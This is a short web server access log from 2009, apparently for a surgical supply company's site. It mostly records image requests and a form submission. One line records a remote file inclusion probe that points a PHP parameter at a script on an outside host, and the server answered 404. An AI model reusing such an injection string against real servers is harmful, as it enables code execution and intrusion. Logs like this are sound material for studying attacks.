70.88.81.237 - - [01/Jul/2009:08:24:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.88.81.237 - - [01/Jul/2009:08:24:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.88.81.237 - - [01/Jul/2009:08:24:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.88.81.237 - - [01/Jul/2009:08:24:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.88.81.237 - - [01/Jul/2009:08:24:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.88.81.237 - - [01/Jul/2009:08:24:57 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.88.81.237 - - [01/Jul/2009:08:24:58 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.134.74 - - [01/Jul/2009:08:25:01 -0400] "GET /logs/access_log.Q109060600//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.88.81.237 - - [01/Jul/2009:08:24:59 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0092089 HTTP/1.1" 200 37521 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
